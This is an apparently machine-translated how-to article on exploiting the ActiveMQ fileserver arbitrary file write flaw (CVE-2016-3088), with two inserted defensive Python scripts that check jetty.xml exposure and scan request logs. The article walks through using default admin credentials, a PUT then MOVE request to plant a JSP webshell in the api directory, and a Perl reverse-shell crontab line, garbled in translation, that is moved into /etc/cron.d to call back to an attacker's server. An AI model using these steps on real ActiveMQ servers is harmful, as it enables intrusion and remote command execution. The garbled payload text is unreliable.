2025-04-04 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
ActiveMQ arbitrary file write vulnerability (CVE-2016-3088): example analysis. Many beginners are unclear about this vulnerability, so the editor explains it in detail below; anyone who needs it can follow along, and I hope you gain something from it.
Background introduction
The ActiveMQ web console consists of three applications: admin, api and fileserver. admin is the administration page, api is the interface, and fileserver is the interface for storing files. admin and api require a login before they can be used; fileserver does not.
The fileserver is a RESTful API: the files stored in it can be read and written through HTTP requests such as GET, PUT and DELETE. It was designed to make up for the fact that message queue operations could not transfer and store binaries, but it was later found that:
its usage was low, and
file operations are prone to vulnerabilities.
Therefore, ActiveMQ disables the fileserver application by default in 5.12.x~5.13.x (it can be re-enabled in conf/jetty.xml), and from 5.14.0 onwards the fileserver application is removed entirely.
When testing, check the ActiveMQ version first to avoid wasting effort.
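The version notes above translate directly into a triage check a defender can run against an installation's own conf/jetty.xml. The script below is an added example, not code from the original article or from the ActiveMQ project. It assumes the stock jetty.xml layout (a Spring beans file with one Jetty WebAppContext bean per web application, each with a contextPath property); the embedded jetty.xml is a constructed sample, and the hypothetical helper names (fileserver_exposure, remove_fileserver_context) are mine. It reports whether the fileserver context is deployed, what the default for that version would have been, and produces a hardened jetty.xml with the fileserver context removed.

```python
import re
import xml.etree.ElementTree as ET

SPRING_BEANS_NS = "http://www.springframework.org/schema/beans"

# Constructed sample modelled on the layout of a stock ActiveMQ conf/jetty.xml
# (not copied from a real installation). Each web application is a WebAppContext bean.
SAMPLE_JETTY_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="handlers" class="org.eclipse.jetty.server.handler.HandlerCollection">
    <property name="handlers">
      <list>
        <bean class="org.eclipse.jetty.webapp.WebAppContext">
          <property name="contextPath" value="/admin" />
          <property name="resourceBase" value="${activemq.home}/webapps/admin" />
        </bean>
        <bean class="org.eclipse.jetty.webapp.WebAppContext">
          <property name="contextPath" value="/fileserver" />
          <property name="resourceBase" value="${activemq.home}/webapps/fileserver" />
        </bean>
        <bean class="org.eclipse.jetty.webapp.WebAppContext">
          <property name="contextPath" value="/api" />
          <property name="resourceBase" value="${activemq.home}/webapps/api" />
        </bean>
      </list>
    </property>
  </bean>
</beans>
"""


def _local(tag):
    """Strip the XML namespace from a tag name: '{ns}bean' -> 'bean'."""
    return tag.rsplit("}", 1)[-1]


def parse_version(version):
    """'5.11.1' -> (5, 11, 1); tolerates suffixes such as '5.13.0-SNAPSHOT'."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {version!r}")
    return tuple(int(x or 0) for x in m.groups())


def _is_context_bean(elem, path=None):
    """True if elem is a WebAppContext bean (optionally with the given contextPath)."""
    if _local(elem.tag) != "bean" or not elem.get("class", "").endswith("WebAppContext"):
        return False
    for prop in elem:
        if _local(prop.tag) == "property" and prop.get("name") == "contextPath":
            return path is None or prop.get("value") == path
    return False


def context_paths(jetty_xml):
    """Return the contextPath of every WebAppContext bean, in document order."""
    root = ET.fromstring(jetty_xml)
    paths = []
    for bean in root.iter():
        if _is_context_bean(bean):
            for prop in bean:
                if _local(prop.tag) == "property" and prop.get("name") == "contextPath":
                    paths.append(prop.get("value"))
    return paths


def fileserver_exposure(version, jetty_xml):
    """Combine the version thresholds from the text with what jetty.xml actually deploys."""
    v = parse_version(version)
    deployed = "/fileserver" in context_paths(jetty_xml)
    if v >= (5, 14, 0):
        default = "removed"        # webapp no longer shipped
    elif v >= (5, 12, 0):
        default = "disabled"       # shipped but commented out of jetty.xml by default
    else:
        default = "enabled"        # earlier releases, as the text implies
    return {
        "version": version,
        "default_state": default,
        "fileserver_in_jetty_xml": deployed,
        # On 5.14+ there is no fileserver webapp to serve even if a stale context line survives.
        "exposed": deployed and v < (5, 14, 0),
    }


def remove_fileserver_context(jetty_xml):
    """Hardening step: return jetty.xml with the /fileserver WebAppContext bean removed."""
    ET.register_namespace("", SPRING_BEANS_NS)  # keep the default namespace on output
    root = ET.fromstring(jetty_xml)
    for parent in root.iter():
        for child in list(parent):
            if _is_context_bean(child, "/fileserver"):
                parent.remove(child)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for ver in ("5.11.1", "5.13.3", "5.15.0"):
        print(fileserver_exposure(ver, SAMPLE_JETTY_XML))
    print(context_paths(remove_fileserver_context(SAMPLE_JETTY_XML)))
```

Run it against the real conf/jetty.xml and the version reported by the broker; a result with "exposed": True on a 5.12.x or 5.13.x install means someone re-enabled fileserver by hand, which is the configuration the rest of this article relies on.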
Vulnerability details
The vulnerability lies in the fileserver application, and its principle is simple: the fileserver allows files to be written (but does not parse JSP) and allows files to be moved (MOVE requests). So one only needs to write a file and then move it to an arbitrary location with a MOVE request, which amounts to an arbitrary file write.
Vulnerability exploitation
There are several ways to exploit the file write:
1. Write a webshell
2. Write files such as a cron entry or an SSH key
3. Write libraries and configuration files such as a jar or jetty.xml
Writing a webshell is convenient, but the fileserver does not parse JSP and both admin and api require a login, so it is somewhat futile. Writing a cron entry or SSH key gives a reverse shell directly, which is also convenient, but the drawback is that it requires root privileges. Writing a jar is troublesome (it needs a jar backdoor), and writing the XML configuration file is a reliable method but again somewhat futile: the absolute path of ActiveMQ must be known.
Next, let's try these methods.
Method 1: Write a webshell
As mentioned earlier, the webshell must be written into the admin or api application, and both require a login to access.
The default ActiveMQ username and password are both admin.
Then open the fileserver directory from the home page.
Capture the request with Burp (just refresh the page), send it to Repeater, change the method to PUT and write the shell. The request line is as follows:
PUT /fileserver/1.txt HTTP/1.1
Checking the corresponding directory shows that the shell file has indeed been written, but a .txt file cannot be executed, so it has to be converted into a .jsp file.
Capture the request again, send it to Repeater, change the method to MOVE and set the header Destination: file:///opt/activemq/webapps/api/testhacker.jsp, because the api directory parses JSP files.
Open the api directory and view the newly moved testhacker.jsp; a blank page indicates that the webshell was uploaded successfully.
At this point commands can be executed through the URL and the results are returned.
You can also view the generated file in the web directory of the target machine.
Notes on the experiment
The barrier to writing a webshell is low and convenient, but the fileserver directory is not allowed to execute JSP. To execute a JSP webshell, the .jsp file has to be placed in the admin or api directory, which are allowed to parse JSP, but both directories require a login. So when the response is 4XX, a login is required.
Vulnerability principle
From the steps above it can be seen that the principle of the vulnerability is simply that the fileserver directory supports writing files and supports MOVE requests to move them. So one only needs to write a file and then move it with MOVE to a directory that parses JSP; executing it turns the arbitrary file write into code execution.
The process is: write the file (PUT method) -> move the file (MOVE method) -> execute the file.
Method 2: Write to crontab and get a reverse shell through a scheduled task
This is a relatively robust method. First upload the cron configuration file (note that line endings must be `\n`, not `\r\n`, otherwise crontab execution fails).
Visit yourip:port/fileserver directly and capture the request, write the following into the request body, change the method to PUT, and set the listening IP and port:
* / 1 * root / usr/bin/perl-e'use Socket;$i= "listens to vps's IP"; $p = listening port; socket (SMagp PFRTINETGravity SOCKSTREAM.dgetprotobyname ("tcp")); if (connect (Smae sockaddringin ($pmae inetyogaton ($I) {open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/sh-I");};
Then visit the file in the browser and capture the request, change GET to MOVE and move it into /etc/cron.d/, with the header Destination: file:///etc/cron.d/root
This method requires ActiveMQ to be running as root; otherwise the cron file cannot be written.
If both requests return 204, the write succeeded. Listen on the corresponding port and wait for the shell to connect back.
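Both walkthroughs (the webshell and the crontab variant) leave the same trace in the broker's HTTP request log: an unauthenticated PUT to /fileserver/ answered with 204, followed shortly by a MOVE of the same path, also 204. The script below is an added detection example, not code from the article or from ActiveMQ. It assumes Jetty's NCSA-style request-log format; the log lines are constructed samples, and the function names (parse_line, find_fileserver_writes) are mine. Every non-GET request to fileserver is reported, and a PUT/MOVE pair from the same client on the same path within a time window is reported as a second, higher-confidence finding.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Jetty's NCSA request-log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2019:10:15:02 +0000] "GET /fileserver/ HTTP/1.1" 200 513
10.0.0.5 - - [31/May/2019:10:15:09 +0000] "PUT /fileserver/1.txt HTTP/1.1" 204 0
10.0.0.5 - - [31/May/2019:10:15:21 +0000] "MOVE /fileserver/1.txt HTTP/1.1" 204 0
10.0.0.5 - - [31/May/2019:10:15:40 +0000] "GET /api/testhacker.jsp HTTP/1.1" 200 0
10.0.0.7 - - [31/May/2019:10:16:00 +0000] "GET /admin/index.jsp HTTP/1.1" 401 0
10.0.0.9 - - [31/May/2019:11:02:44 +0000] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
"""

# client - user [timestamp] "METHOD path HTTP/x" status size
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# fileserver is unauthenticated, so any of these methods is worth a look.
WRITE_METHODS = {"PUT", "MOVE", "DELETE"}


def parse_line(line):
    """Parse one NCSA request-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_fileserver_writes(lines, window=timedelta(minutes=5)):
    """Report write methods against /fileserver/ and PUT->MOVE chains on the same path."""
    findings = []
    recent_puts = {}  # (client, path) -> timestamp of the last accepted PUT
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/fileserver/"):
            continue
        if rec["method"] not in WRITE_METHODS:
            continue
        key = (rec["client"], rec["path"])
        findings.append({
            "kind": "fileserver_write",
            "client": rec["client"],
            "method": rec["method"],
            "path": rec["path"],
            "status": rec["status"],
        })
        # 204 is the success status the article observes for both PUT and MOVE.
        if rec["method"] == "PUT" and rec["status"] == 204:
            recent_puts[key] = rec["ts"]
        elif rec["method"] == "MOVE" and rec["status"] == 204:
            put_ts = recent_puts.get(key)
            if put_ts is not None and rec["ts"] - put_ts <= window:
                findings.append({
                    "kind": "put_then_move",
                    "client": rec["client"],
                    "path": rec["path"],
                    "seconds_apart": (rec["ts"] - put_ts).total_seconds(),
                })
    return findings


if __name__ == "__main__":
    for f in find_fileserver_writes(SAMPLE_LOG.splitlines()):
        print(f)
```

The Destination header that carries the real target path is not in a standard access log, so the correlation works on method, path and timing alone; if the broker sits behind a proxy that logs request headers, adding the Destination value to the finding is the obvious extension.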
I do not understand the third method, writing jetty.xml or a jar, so it is not covered here. I hope the above content was helpful to you.